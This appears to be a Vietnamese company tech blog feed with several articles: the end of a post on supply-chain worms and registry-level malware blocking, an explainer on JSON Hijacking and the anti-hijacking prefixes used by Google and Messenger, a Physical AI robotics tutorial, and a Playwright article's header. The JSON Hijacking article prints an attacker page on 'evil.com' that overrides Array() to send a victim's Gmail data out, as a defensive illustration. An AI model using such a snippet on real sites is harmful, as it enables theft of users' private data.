<p>Trỏ registry về Takumi Guard và gắn token. Thay <code>tg_YOUR_TOKEN</code> bằng token thật của bạn.</p>
<pre><code class="language-bash"># Cài đặt cho NPM
npm config set registry https://npm.flatt.tech/
npm config set //npm.flatt.tech/:_authToken tg_YOUR_TOKEN

# Cài đặt cho Python (PIP)
pip config set global.index-url https://token:tg_YOUR_TOKEN@pypi.flatt.tech/simple/
</code></pre>
<pre><code class="language-yaml"># yarn (v2+) — thêm vào .yarnrc.yml
npmRegistryServer: "https://npm.flatt.tech/"
npmAuthToken: "tg_YOUR_TOKEN"
</code></pre>
<pre><code class="language-toml"># bun — thêm vào bunfig.toml
[install]
registry = { url = "https://npm.flatt.tech/", token = "tg_YOUR_TOKEN" }
</code></pre>
<h3 id="bc04kimtracit">Bước 04 — Kiểm tra cài đặt</h3>
<p>Cài thử package giả lập độc hại. Nếu bị chặn với lỗi <code>403 Forbidden</code> thì Takumi Guard đang hoạt động đúng — <strong>bị chặn = thành công</strong>.</p>
<pre><code class="language-text">$ npm install @panda-guard/test-malicious
npm error code E403
npm error 403 Forbidden - GET https://npm.flatt.tech/...
npm error 403 In most cases, you or one of your dependencies are requesting
npm error 403 a package version that is forbidden by your security policy, or
npm error 403 on a server you do not have access to.
npm error A complete log of this run can be found in:
npm error /Users/administrator/.npm/_logs/2026-04-21T07_37_18_247Z-debug-0.log
</code></pre>
<p>✓ <strong>Thành công — package độc hại đã bị chặn.</strong></p>
<h3 id="trnghpmthochthntoken">🔑 Trường hợp mất hoặc hết hạn Token</h3>
<p>Nếu bị mất Token hoặc Token hết hạn, hãy thực hiện lại <strong>Bước 01</strong> để nhận mail — trong mail có hướng dẫn reset kèm mã <code>code</code>:</p>
<pre><code class="language-bash"># Lost Your Key Completely?
curl -X POST https://npm.flatt.tech/api/v1/tokens/reset \
  --json '{"email": "you_email@vietnamlab.vn", "code": "XXXXXXXX"}'
</code></pre>
<p><strong>Lưu ý quan trọng:</strong></p>
<ul>
<li>Lệnh này sẽ <strong>vô hiệu hóa (invalidate)</strong> Token hiện tại của bạn.</li>
<li>Mã <code>reset code</code> sẽ hết hạn sau <strong>1 giờ</strong> kể từ khi yêu cầu.</li>
</ul>
<hr>
<h2 id="11ktlun">11. Kết luận</h2>
<p>Chuỗi sự kiện <em>DurableTask → Binding.gyp → Miasma</em> cho thấy một xu hướng mới:</p>
<blockquote>
<p>"Malware không còn chỉ tấn công người dùng cuối, mà đang tấn công chính các nhà phát triển và hệ sinh thái phát triển phần mềm."</p>
</blockquote>
<p>Sự kết hợp giữa <strong>Supply Chain Attack</strong> + <strong>Self-Replicating Worm</strong> + <strong>Credential Theft</strong> + <strong>AI Agent Targeting</strong> đã tạo ra một lớp đe dọa mới mà nhiều mô hình DevSecOps hiện nay chưa được thiết kế để chống lại.</p>
<p>Nếu <strong>SolarWinds</strong> là cuộc tấn công supply chain nổi tiếng của thập kỷ trước, thì <strong>Miasma</strong> có thể là hình mẫu đầu tiên của một <em>"AI-aware software supply chain worm"</em> — một loại sâu máy tính được tối ưu hóa cho kỷ nguyên AI coding assistants và open-source ecosystems.</p>
<h2 id="12ngunthamkho">12. Nguồn tham khảo</h2>
<p><a href="https://www.stepsecurity.io/blog/microsofts-durabletask-pypi-package-compromised-in-supply-chain-attack">https://www.stepsecurity.io/blog/microsofts-durabletask-pypi-package-compromised-in-supply-chain-attack</a><br>
<a href="https://www.stepsecurity.io/blog/binding-gyp-npm-supply-chain-attack-spreads-like-worm">https://www.stepsecurity.io/blog/binding-gyp-npm-supply-chain-attack-spreads-like-worm</a><br>
<a href="https://www.stepsecurity.io/blog/miasma-worm-hits-microsoft-again-azure-functions-action-and-72-other-repositories-disabled-after-supply-chain-attack-targeting-ai-coding-agents">https://www.stepsecurity.io/blog/miasma-worm-hits-microsoft-again-azure-functions-action-and-72-other-repositories-disabled-after-supply-chain-attack-targeting-ai-coding-agents</a></p>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>Bí Mật Sau Những Ký Tự Lạ Trong API Response Của Big Tech</h1>
<p>Đào Minh Nhật — Mon, 22 Jun 2026 09:32:16 GMT</p>
<!--kg-card-begin: markdown--><h2 id="giithiu">Giới thiệu</h2>
<p>Bạn có bao giờ mở DevTools, bắt một API response từ Google hay Messenger, rồi ngạc nhiên khi thấy phần đầu của dữ liệu trông như thế này không?</p>
<pre><code>)]}'\n[{"id": 1, "name": "Alice"}, ...]
</code></pre>
<p>Hoặc thậm chí là một vòng lặp <code>while(1);</code> hay <code>for(;;);</code> ngay trước khi JSON bắt đầu?</p>
<p>Đây không phải bug. Đây là một kỹ thuật phòng thủ chủ động — được thiết kế để chống lại một lỗ hổng bảo mật có tên <strong>JSON Hijacking</strong>. Bài viết này sẽ giải thích từng bước cơ chế tấn công, cách các ông lớn công nghệ đối phó, và lý do tại sao họ vẫn duy trì kỹ thuật này cho đến ngày nay.</p>
<hr>
<p></p>
<h2 id="nidungchnh">Nội dung chính</h2>
<h3 id="1jsonhijackinglg">1. JSON Hijacking là gì?</h3>
<p>JSON Hijacking là một kỹ thuật tấn công khai thác sự kết hợp giữa hai đặc điểm của trình duyệt:</p>
<ul>
<li><strong>Same Origin Policy (SOP):</strong> Trình duyệt ngăn một trang web đọc dữ liệu từ một domain khác — nhưng chỉ áp dụng với <code>fetch</code> hay <code>XMLHttpRequest</code>.</li>
<li><strong>Thẻ <code><script></code> là ngoại lệ:</strong> Trình duyệt <em>luôn cho phép</em> tải và thực thi JavaScript từ bất kỳ domain nào qua thẻ <code><script></code>, kể cả khi domain đó thuộc bên thứ ba.</li>
</ul>
<p>Và đây chính là lỗ hổng.</p>
<hr>
<h3 id="2cchtncngstepbystep">2. Cơ chế tấn công — Step by Step</h3>
<p><strong>Bước 1: Nạn nhân đang đăng nhập Google</strong></p>
<p>Người dùng đang mở sẵn tab Gmail, nghĩa là trình duyệt đang lưu cookie phiên đăng nhập Google.</p>
<p><strong>Bước 2: Kẻ tấn công dụ nạn nhân vào trang mạo danh</strong></p>
<p>Kẻ tấn công tạo một trang web có chứa đoạn code như sau:</p>
<pre><code class="language-html"><!-- Trang web của kẻ tấn công: evil.com -->
<script>
  // Ghi đè hàm khởi tạo mảng trước khi JSON load
  function Array() {
    // "this" ở đây chính là mảng JSON vừa được parse
    // Kẻ tấn công lấy được dữ liệu ngay tại đây
    sendToAttacker(this);
  }
</script>

<!-- Trình duyệt sẽ tự đính kèm cookie Google vào request này -->
<script src="https://mail.google.com/mail/feed/atom"></script>
</code></pre>
<p><strong>Bước 3: Trình duyệt tự làm việc thay kẻ tấn công</strong></p>
<p>Khi nạn nhân truy cập <code>evil.com</code>:</p>
<ol>
<li>Trình duyệt thấy thẻ <code><script></code> trỏ đến <code>mail.google.com</code>.</li>
<li>Vì nạn nhân đang đăng nhập Google, trình duyệt <strong>tự động đính kèm cookie</strong> vào request.</li>
<li>Google trả về dữ liệu JSON — ví dụ một mảng danh sách email: <code>[{"subject": "...", "from": "..."}]</code>.</li>
<li>Trình duyệt cố gắng thực thi mảng JSON này như JavaScript.</li>
<li>Vì hàm <code>Array()</code> đã bị ghi đè từ trước, kẻ tấn công <strong>nghe lén được toàn bộ dữ liệu</strong>.</li>
</ol>
<blockquote>
<p><strong>Tóm lại:</strong> Kẻ tấn công không cần đánh cắp cookie. Chúng chỉ cần để trình duyệt của nạn nhân <em>tự gọi API</em> và <em>tự nộp</em> dữ liệu về.</p>
</blockquote>
<hr>
<h3 id="3cchgooglevccnglnphngchng">3. Cách Google và các ông lớn phòng chống</h3>
<p>Giải pháp rất thông minh: <strong>làm cho JSON không thể thực thi được khi tải qua thẻ <code><script></code></strong>, trong khi trang web chính chủ vẫn đọc được bình thường.</p>
<h4 id="googlechnktrcvou">Google — Chèn ký tự rác vào đầu</h4>
<p>Google thêm chuỗi <code>)]}'\n</code> trước khi JSON bắt đầu:</p>
<pre><code>)]}'\n
[{"id": 1, "email": "alice@gmail.com"}, ...]
</code></pre>
<p><strong>Tại sao hiệu quả?</strong></p>
<p>Khi kẻ tấn công tải URL này qua thẻ <code><script></code>, trình duyệt cố parse <code>)]}'\n</code> như JavaScript — và lập tức báo lỗi cú pháp (<code>SyntaxError</code>), dừng thực thi ngay lập tức. Dữ liệu phía sau không bao giờ được đọc.</p>
<p><strong>Trang chính chủ đọc như thế nào?</strong></p>
<pre><code class="language-javascript">// Client Google thực hiện
const response = await fetch("https://mail.google.com/mail/feed/atom");
const rawText = await response.text();

// Cắt bỏ phần "rác" ở đầu trước khi parse
const cleanJson = rawText.replace(")]}'\n", "");
const data = JSON.parse(cleanJson);
</code></pre>
<p>Log output ví dụ:</p>
<pre><code>rawText: )]}'\n[{"id":1,"email":"alice@gmail.com"}]
cleanJson: [{"id":1,"email":"alice@gmail.com"}]
data: Array(1) [ { id: 1, email: "alice@gmail.com" } ]
</code></pre>
<hr>
<h4 id="messengercanvavnglpvtn">Messenger / Canva — Vòng lặp vô tận</h4>
<p>Facebook Messenger và Canva chọn cách khác: chèn <code>for(;;);</code> hoặc <code>while(true);</code> trước JSON.</p>
<pre><code>for(;;);
{"t":"msg","payload":{"thread_id":"...","message":"..."}}
</code></pre>
<p><strong>Tại sao hiệu quả?</strong></p>
<p>Khi kẻ tấn công tải qua thẻ <code><script></code>, trình duyệt thực thi <code>for(;;);</code> — một vòng lặp chạy mãi mãi. Tab của kẻ tấn công bị <strong>đơ hoàn toàn</strong> và không bao giờ đọc được dữ liệu phía sau.</p>
<p><strong>Trang chính chủ đọc như thế nào?</strong></p>
<pre><code class="language-javascript">const response = await fetch("https://www.messenger.com/api/...");
const rawText = await response.text();

// Cắt bỏ "for(;;);" ở đầu
const cleanJson = rawText.replace("for(;;);", "");
const data = JSON.parse(cleanJson);
</code></pre>
<p>Log output ví dụ:</p>
<pre><code>rawText: for(;;);{"t":"msg","payload":{"thread_id":"xyz"}}
cleanJson: {"t":"msg","payload":{"thread_id":"xyz"}}
data: { t: "msg", payload: { thread_id: "xyz" } }
</code></pre>
<hr>
<h3 id="4sosnhhaikthut">4. So sánh hai kỹ thuật</h3>
<table>
<thead>
<tr>
<th>Tiêu chí</th>
<th>Google (ký tự rác)</th>
<th>Messenger/Canva (vòng lặp vô tận)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Cơ chế dừng</td>
<td>Lỗi cú pháp</td>
<td>Vòng lặp treo tab</td>
</tr>
<tr>
<td>Tốc độ phát hiện</td>
<td>Ngay lập tức</td>
<td>Ngay lập tức</td>
</tr>
<tr>
<td>Tác động lên kẻ tấn công</td>
<td>Script dừng lại</td>
<td>Tab bị đơ/crash</td>
</tr>
<tr>
<td>Độ "khó chịu" với kẻ tấn công</td>
<td>Trung bình</td>
<td>Cao hơn</td>
</tr>
</tbody>
</table>
<hr>
<h3 id="5tisaovndngdtrnhduytvli">5. Tại sao vẫn dùng dù trình duyệt đã vá lỗi?</h3>
<p>Các trình duyệt hiện đại (Chrome, Safari, Edge) đã <strong>vá lỗ hổng ghi đè <code>Array Constructor</code></strong> từ hơn 10 năm trước. Vậy tại sao Google và Messenger vẫn giữ những đoạn mã này?</p>
<p>Câu trả lời nằm ở nguyên tắc <strong>Defense in Depth — Bảo mật nhiều lớp</strong>.</p>
<blockquote>
<p>Không bao giờ đặt toàn bộ niềm tin vào một lớp bảo vệ duy nhất.</p>
</blockquote>
<p>Có ba lý do thực tế:</p>
<p><strong>Lý do 1: Người dùng vẫn dùng trình duyệt đời cũ</strong></p>
<p>Smart TV, thiết bị IoT, trình duyệt cũ trên các thị trường đang phát triển — rất nhiều thiết bị chạy các phiên bản Chrome/WebKit từ 5–10 năm trước, chưa có bản vá này.</p>
<p><strong>Lý do 2: Phòng thủ trước zero-day</strong></p>
<p>Một lỗ hổng zero-day mới trong trình duyệt có thể làm sống lại kiểu tấn công tương tự. Kỹ thuật prefix này là lớp phòng thủ tồn tại <em>độc lập</em> với trình duyệt.</p>
<p><strong>Lý do 3: Chi phí duy trì gần bằng 0</strong></p>
<p>Thêm vài byte vào đầu response và một dòng <code>replace()</code> ở client không ảnh hưởng đến hiệu năng. Với chi phí gần bằng 0 như vậy, tại sao lại bỏ đi?</p>
<hr>
<p></p>
<h2 id="tngkt">Tổng kết</h2>
<p>JSON Hijacking là một minh chứng thú vị cho thấy cách một đặc điểm của trình duyệt (thẻ <code><script></code> luôn được phép cross-origin) có thể bị lợi dụng để phá vỡ mô hình bảo mật thông thường.</p>
<p>Những ký tự trông có vẻ "rác" ở đầu JSON của Google thực ra là một kỹ thuật phòng thủ tinh tế:</p>
<ul>
<li><strong>Tấn công qua <code><script></code>:</strong> Bị chặn ngay lập tức do lỗi cú pháp hoặc vòng lặp vô tận.</li>
<li><strong>Truy cập hợp lệ qua Fetch API:</strong> Hoạt động bình thường sau khi cắt bỏ phần prefix.</li>
<li><strong>Nguyên tắc Defense in Depth:</strong> Không phụ thuộc hoàn toàn vào trình duyệt để bảo vệ người dùng.</li>
</ul>
<p>Lần sau khi bạn thấy <code>for(;;);</code> hay <code>)]}'\n</code> trong một API response, hãy nhớ rằng đó không phải bug — đó là một lớp áo giáp được thiết kế rất cẩn thận.</p>
<hr>
<h2 id="tiliuthamkho">Tài liệu tham khảo</h2>
<ul>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/AJAX_Security_Cheat_Sheet.html">OWASP AJAX Security Cheat Sheet — Protect Against JSON Hijacking</a></li>
<li><a href="https://portswigger.net/research/json-hijacking-for-the-modern-web">PortSwigger Research: JSON Hijacking for the Modern Web</a></li>
<li><a href="https://haacked.com/archive/2009/06/25/json-hijacking.aspx/">Phil Haack: JSON Hijacking (bài viết gốc giải thích lỗ hổng Array constructor)</a></li>
<li><a href="https://docs.gitlab.com/user/application_security/api_security_testing/checks/json_hijacking_check/">GitLab Docs: JSON Hijacking Check — định nghĩa và cách khắc phục</a></li>
<li><a href="https://dev.to/antogarand/why-facebooks-api-starts-with-a-for-loop-1eob">Dev.to: Why Facebook's API starts with a for loop</a></li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>Tìm hiểu Physical AI & Robotics</h1>
<p>L.M.T — Mon, 22 Jun 2026 09:16:34 GMT</p>
<!--kg-card-begin: markdown--><h2 id="mclc">Mục lục</h2>
<ol>
<li><a href="#physical-ai-la-gi">Physical AI là gì?</a></li>
<li><a href="#ben-trong-mot-robot-co-gi">Bên trong một robot có gì?</a></li>
<li><a href="#tai-sao-can-simulation">Tại sao cần Simulation?</a></li>
<li><a href="#neural-network-lam-gi-trong-robot">Neural Network làm gì trong robot?</a></li>
<li><a href="#sim-to-real-va-cac-mo-hinh-ai-hien-dai">Sim-to-Real và các mô hình AI hiện đại</a></li>
<li><a href="#thuc-hanh-chay-demo-tu-a-z">Thực hành: Chạy demo từ A-Z</a></li>
<li><a href="#ket-luan">Kết luận</a></li>
</ol>
<hr>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="physicalailg">Physical AI là gì?</h2>
<p>Physical AI là hệ thống AI có khả năng hiểu và tương tác với thế giới vật lý. Khác với AI truyền thống chỉ xử lý text hay ảnh, Physical AI phải:</p>
<ul>
<li><strong>Hiểu vật lý</strong>: trọng lực kéo vật xuống, ma sát giữ vật không trượt, lực cần thiết để nâng một chiếc cốc.</li>
<li><strong>Hành động trong không gian 3D</strong>: di chuyển, nắm, đẩy, xoay vật thể.</li>
<li><strong>Phản ứng real-time</strong>: xử lý sensor data và ra quyết định trong mili-giây.</li>
<li><strong>Chịu được sai số</strong>: thế giới thực không hoàn hảo như mô phỏng.</li>
</ul>
<p>Điểm khác biệt lớn nhất? Khi LLM trả lời sai, bạn chỉ cần hỏi lại. Khi robot hành động sai, nó có thể làm vỡ cốc, đổ cà phê - hoặc tệ hơn, gây nguy hiểm cho người xung quanh.</p>
<p></p>
<h2 id="bntrongmtrobotcg">Bên trong một robot có gì?</h2>
<p>Một robot về cơ bản gồm 3 thành phần chính:</p>
<p><strong>1. Sensors (Cảm biến)</strong> - "giác quan" của robot. Encoder đo góc quay khớp, gyroscope đo vận tốc, cảm biến lực đo áp lực tiếp xúc, camera cung cấp hình ảnh. Ví dụ, bàn tay robot Shadow Dexterous Hand có 92 cảm biến xúc giác phân bố trên lòng bàn tay và các đốt ngón.</p>
<p><strong>2. Brain (Bộ não)</strong> - một Neural Network nhận dữ liệu từ sensors và quyết định hành động tiếp theo. Đây chính là phần "AI" của robot.</p>
<p><strong>3. Actuators (Cơ cấu chấp hành)</strong> - "cơ bắp" của robot. Motor nhận tín hiệu điều khiển và tạo ra chuyển động.</p>
<p>Một khái niệm quan trọng là <strong>Degrees of Freedom (DOF)</strong> - số chuyển động độc lập robot có thể thực hiện. Cánh tay người có 7 DOF, bàn tay người có khoảng 21-27 DOF (tuỳ cách đếm). Shadow Dexterous Hand mô phỏng bàn tay người với 24 DOF. DOF càng cao, robot càng linh hoạt nhưng bài toán điều khiển càng khó.</p>
<p></p>
<h2 id="tisaocnsimulation">Tại sao cần Simulation?</h2>
<p>Bạn không thể dạy robot bằng cách để nó thử-sai trên robot thật. Một robot công nghiệp giá $50k-$500k, mỗi lần thử sai có thể làm hỏng phần cứng hoặc gây nguy hiểm. Và để học được, agent cần hàng triệu lần thử.</p>
<p>Giải pháp: <strong>Simulation</strong> - mô phỏng toàn bộ robot và môi trường vật lý trên máy tính. <strong>MuJoCo</strong> (Multi-Joint dynamics with Contact) là physics engine phổ biến nhất; DeepMind mua lại năm 2021 và open-source dưới Apache 2.0 năm 2022.</p>
<p>Lợi ích simulation:</p>
<ul>
<li><strong>Rẻ</strong>: máy tính chạy 24/7, không hỏng hóc.</li>
<li><strong>Nhanh</strong>: 1 ngày sim = hàng năm trải nghiệm thực.</li>
<li><strong>An toàn</strong>: robot có "chết" cũng chỉ là reset.</li>
<li><strong>Song song</strong>: chạy 1000 instance cùng lúc trên cluster.</li>
</ul>
<h2 id="neuralnetworklmgtrongrobot">Neural Network làm gì trong robot?</h2>
<p>Vấn đề cốt lõi: robot nhận 153 con số từ sensors và cần đưa ra 20 con số điều khiển motor. Hàm nào ánh xạ từ observation sang action? Đó chính là <strong>Neural Network</strong>.</p>
<p>Ví dụ với môi trường Shadow Hand:</p>
<pre><code class="language-python">import gymnasium as gym
import gymnasium_robotics

gymnasium_robotics.register_robotics_envs()
env = gym.make("HandManipulateBlock_ContinuousTouchSensors-v1")
obs, _ = env.reset()

print(obs["observation"].shape)   # (153,)  ← 61 robot state + 92 touch
print(env.action_space.shape)     # (20,)   ← 20 motor commands
</code></pre>
<p>Trong thuật toán <strong>SAC (Soft Actor-Critic)</strong>:</p>
<ul>
<li><strong>Actor Network</strong>: nhận observation, trả về action - "đầu ra" của robot.</li>
<li><strong>Critic Network</strong>: đánh giá action tốt hay xấu - giúp Actor cải thiện.</li>
</ul>
<p>Quá trình training lặp hàng nghìn lần: nhìn → chọn action → nhận reward → cập nhật weights. Sau khi train xong, chỉ cần Actor Network để điều khiển robot với inference ~0.5ms.</p>
<p></p>
<h2 id="simtorealvccmhnhaihini">Sim-to-Real và các mô hình AI hiện đại</h2>
<h3 id="simtoreallg">Sim-to-Real là gì?</h3>
<p>Robot học rất giỏi trong simulation, nhưng đem ra đời thực thì... vấp. Lý do: simulation không bao giờ giống hệt thực tế — ma sát sàn khác chút, khối lượng vật lệch vài gram, motor phản hồi chậm hơn, ánh sáng camera thay đổi. Khoảng cách này gọi là <strong>sim-to-real gap</strong>. Policy học "vừa khít" với sim sẽ thất bại khi gặp những sai lệch nhỏ đó ngoài thực tế.</p>
<p><strong>Sim-to-Real</strong> là bài toán chuyển policy từ simulation sang robot thật mà vẫn chạy tốt.</p>
<h3 id="giiphpdomainrandomization">Giải pháp: Domain Randomization</h3>
<p>Ý tưởng: thay vì train trong 1 thế giới sim cố định, ta <strong>random hoá tham số vật lý</strong> (ma sát, khối lượng, lực, độ trễ, ánh sáng) mỗi episode. Agent buộc phải học policy chạy được trên <em>nhiều</em> biến thể khác nhau — nên khi gặp thực tế (chỉ là một biến thể nữa), nó không bỡ ngỡ.</p>
<p>Ví dụ trực quan: thay vì luyện lái xe trên đúng 1 con đường, bạn luyện trên hàng nghìn con đường khác nhau — ra đường lạ vẫn lái được. OpenAI dùng cách này để giải Rubik's Cube bằng 1 tay robot (2019).</p>
<h3 id="ccmhnhaihini">Các mô hình AI hiện đại</h3>
<p>Mở rộng khả năng Physical AI:</p>
<table>
<thead>
<tr>
<th>Hướng</th>
<th>Ý tưởng</th>
<th>Ví dụ</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>VLA (Vision-Language-Action)</strong></td>
<td>Gộp camera + ngôn ngữ + action vào 1 model</td>
<td>π0, RT-2, NVIDIA GR00T</td>
</tr>
<tr>
<td><strong>Diffusion Policy</strong></td>
<td>Sinh cả chuỗi trajectory thay vì 1 action</td>
<td>Cải thiện trung bình 46.9% so với 2 baseline BC-RNN và LSTM-GMM trên 15 task benchmark</td>
</tr>
<tr>
<td><strong>World Models</strong></td>
<td>Dự đoán tương lai bằng video, robot "suy nghĩ" trước khi làm</td>
<td>NVIDIA Cosmos</td>
</tr>
</tbody>
</table>
<p>Tất cả các approach trên vẫn dựa trên 2 nền tảng cũ: <strong>RL + Simulation</strong>. Chỉ khác ở scale, data, và architecture.</p>
<hr>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="thchnhchymtsdemocbn">Thực hành: Chạy một số demo cơ bản</h2>
<p>Phần này hướng dẫn chạy thử các demo để thấy robot học trong simulation.</p>
<h3 id="yucuhthng">Yêu cầu hệ thống</h3>
<table>
<thead>
<tr>
<th>Mục</th>
<th>Yêu cầu</th>
</tr>
</thead>
<tbody>
<tr>
<td>Python</td>
<td>3.10+</td>
</tr>
<tr>
<td>OS</td>
<td>macOS / Linux (Windows dùng WSL2)</td>
</tr>
<tr>
<td>Disk</td>
<td>~2GB</td>
</tr>
<tr>
<td>GPU</td>
<td>Không bắt buộc (MuJoCo CPU-bound)</td>
</tr>
</tbody>
</table>
<h3 id="setupnhanh1ln">Setup nhanh (1 lần)</h3>
<pre><code class="language-bash"># 1. Clone repo
git clone https://github.com/gmo-vietnamlab/lmt-physical-ai-001.git
cd lmt-physical-ai-001

# 2. Virtual env
python -m venv rl-env
source rl-env/bin/activate

# 3. Cài đặt
pip install "gymnasium-robotics[mujoco]" "stable-baselines3[extra]"
</code></pre>
<blockquote>
<p>⚠️ <strong>Lưu ý</strong>: nếu chạy headless (server không GUI), thay <code>render_mode="human"</code> thành <code>render_mode="rgb_array"</code> trong code demo.</p>
</blockquote>
<h3 id="demo1fetchreachd2pht">Demo 1 — FetchReach (dễ, ~2 phút)</h3>
<p>Robot Fetch di chuyển gripper đến một điểm mục tiêu 3D. Đây là baseline tốt để thấy RL hoạt động ngay.</p>
<pre><code class="language-bash"># Bước 1: train
python demos/fetch_reach.py
# → chọn Option 1: Train FetchReach
# ============================================================
# DEMO 1: FetchReach (easy - solves 100%)
# ============================================================
# Task: move the gripper to the target point (red)
# Action: 4 dims (dx, dy, dz, gripper)
# Observation: 10 dims (gripper position + velocity)

# Training 20k steps...
# Done in 101s

# Result: success=100%, avg_reward=-1.1
# -> The agent learned to move the gripper to the target!

# Model saved: saved_models/fetch_reach_sac.zip

</code></pre>
<p><strong>Kết quả mong đợi</strong>: success rate 100% sau ~20,000 steps. Bạn sẽ thấy robot từ "giật lung tung" (random) chuyển sang "di chuyển chính xác đến điểm đỏ".</p>
<pre><code class="language-bash"># Bước 2: xem robot hoạt động (sau khi train xong)
python demos/fetch_reach.py
# → chọn Option 2: Render FetchReach (xem 3D)
# Render: FetchReachDense-v4
# Close the MuJoCo window to stop.

# 2026-06-05 15:57:44.632 Python[26682:7615390] +[IMKClient subclass]: chose IMKClient_Modern
# 2026-06-05 15:57:44.632 Python[26682:7615390] +[IMKInputSession subclass]: chose IMKInputSession_Modern
#   Episode 1: OK reward=-0.5 (50 steps)
#   Episode 2: OK reward=-1.5 (50 steps)
#   Episode 3: OK reward=-1.9 (50 steps)
#   Episode 4: OK reward=-0.7 (50 steps)
#   Episode 5: OK reward=-1.6 (50 steps)
</code></pre>
<p></p>
<p>Đây là flow chuẩn của một dự án RL: <strong>Train → Save → Load → Inference</strong>:</p>
<p></p>
<h3 id="demo2shadowhandvixcgickh">Demo 2 — Shadow Hand với xúc giác (khó)</h3>
<p>Môi trường phức tạp nhất - cùng loại robot OpenAI dùng giải Rubik's Cube.</p>
<blockquote>
<p><strong>Lưu ý</strong>: demo này <strong>chỉ render môi trường 3D</strong> với <strong>random actions</strong> để bạn cảm nhận độ phức tạp (24 DOF, 92 cảm biến xúc giác) — <strong>không train</strong> để đạt mục tiêu. Bàn tay sẽ cử động ngẫu nhiên, không "giải" được nhiệm vụ. Lý do: bài toán này cần <strong>hàng triệu steps</strong> + GPU, vượt phạm vi một demo nhanh.</p>
</blockquote>
<pre><code class="language-bash">python demos/manipulate_block_touch_sensors_example.py
# Option 1: Continuous Touch Sensors
</code></pre>
<p>Bạn sẽ thấy:</p>
<ul>
<li>Cửa sổ MuJoCo với bàn tay robot <strong>24 DOF</strong> (24 khớp, 20 trong số đó actuated).</li>
<li><strong>92 cảm biến xúc giác</strong> (hiển thị màu khi tiếp xúc).</li>
<li><strong>Observation 153 chiều</strong> = 61 robot state + 92 touch sensors.</li>
<li><strong>Action 20 chiều</strong> = 20 lệnh motor (mỗi motor điều khiển 1 actuated joint).</li>
</ul>
<p></p>
<p><strong>Phân bố 92 cảm biến xúc giác:</strong></p>
<table>
<thead>
<tr>
<th>Vùng</th>
<th>Số vùng</th>
<th>Sensors/vùng</th>
<th>Tổng</th>
</tr>
</thead>
<tbody>
<tr>
<td>Đốt dưới (4 ngón)</td>
<td>4</td>
<td>7</td>
<td>28</td>
</tr>
<tr>
<td>Đốt giữa (4 ngón)</td>
<td>4</td>
<td>5</td>
<td>20</td>
</tr>
<tr>
<td>Đầu ngón (4 ngón)</td>
<td>4</td>
<td>5</td>
<td>20</td>
</tr>
<tr>
<td>Ngón cái (3 đốt)</td>
<td>3</td>
<td>5</td>
<td>15</td>
</tr>
<tr>
<td>Lòng bàn tay</td>
<td>1</td>
<td>9</td>
<td>9</td>
</tr>
<tr>
<td><strong>Tổng cộng</strong></td>
<td></td>
<td></td>
<td><strong>92</strong></td>
</tr>
</tbody>
</table>
<p>Mỗi sensor trả giá trị lực pháp tuyến (float >= 0). Bài toán này cần <strong>hàng triệu steps</strong> để solve - thể hiện độ khó thực sự của Physical AI.</p>
<p></p>
<h3 id="bngyoptionscafetch_reachpy">Bảng đầy đủ options của <code>fetch_reach.py</code></h3>
<table>
<thead>
<tr>
<th>Option</th>
<th>Mô tả</th>
<th>Thời gian</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Train FetchReach - solve 100% (RL)</td>
<td>~2 phút</td>
</tr>
<tr>
<td>2</td>
<td>Render trained model (xem 3D)</td>
<td>Tức thì</td>
</tr>
<tr>
<td>3</td>
<td>Reset (xoá saved model)</td>
<td>Tức thì</td>
</tr>
</tbody>
</table>
<h3 id="troubleshooting">Troubleshooting</h3>
<ul>
<li><strong>Render cần màn hình</strong>: chạy server headless → thay <code>render_mode="rgb_array"</code> hoặc bỏ tham số.</li>
<li><strong>Tốc độ training</strong>: ~175 steps/giây trên MacBook M-series. GPU không giúp nhiều cho MuJoCo (CPU-bound).</li>
<li><strong>FetchSlide không solve ngay</strong>: cần tổng ~300k-500k steps (option 2 khoảng 6-10 lần). Đây là bình thường.</li>
<li><strong>Warning <code>Overriding environment in registry</code></strong>: bỏ qua, không ảnh hưởng.</li>
<li><strong>MuJoCo không hiện GUI trên Mac</strong>: thử <code>mjpython demos/...</code> thay vì <code>python</code>.</li>
</ul>
<hr>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="ktlun">Kết luận</h2>
<p>Physical AI đang ở giai đoạn bùng nổ. Nền tảng vẫn là <strong>RL + Simulation</strong> - đúng như những gì demo này thể hiện. Các approach hiện đại (VLA, Diffusion Policy, World Models) chỉ khác ở scale, data, và architecture - không phải paradigm mới.</p>
<p>Tương lai không xa, robot sẽ xuất hiện trong nhà bếp, nhà máy, bệnh viện - tất cả được "dạy" theo cách bạn vừa thực hành.</p>
<hr>
<h2 id="tiliuthamkho">Tài liệu tham khảo</h2>
<ul>
<li><a href="https://robotics.farama.org/">Gymnasium-Robotics (Farama Foundation)</a></li>
<li><a href="https://mujoco.readthedocs.io/">MuJoCo Documentation</a></li>
<li><a href="https://stable-baselines3.readthedocs.io/">Stable-Baselines3</a></li>
<li><a href="https://openai.com/index/solving-rubiks-cube/">OpenAI - Solving Rubik's Cube with a Robot Hand</a></li>
<li><a href="https://nvidianews.nvidia.com/news/nvidia-isaac-gr00t-n1-open-humanoid-robot-foundation-model-simulation-frameworks">NVIDIA Isaac GR00T</a></li>
<li><a href="https://www.physicalintelligence.company/blog/pi0">Physical Intelligence π0</a></li>
<li><a href="https://arxiv.org/abs/2303.04137">Diffusion Policy paper</a></li>
<li><a href="https://www.nvidia.com/en-sg/ai/cosmos/">NVIDIA Cosmos World Foundation Models</a></li>
<li><a href="https://arxiv.org/abs/1801.01290">Soft Actor-Critic paper</a></li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>Playwright là gì? Từ E2E Testing đến AI Test Agents (2026)</h1>
<p>P.V.P — Thu, 18 Jun 2026 07:33:00 GMT</p>
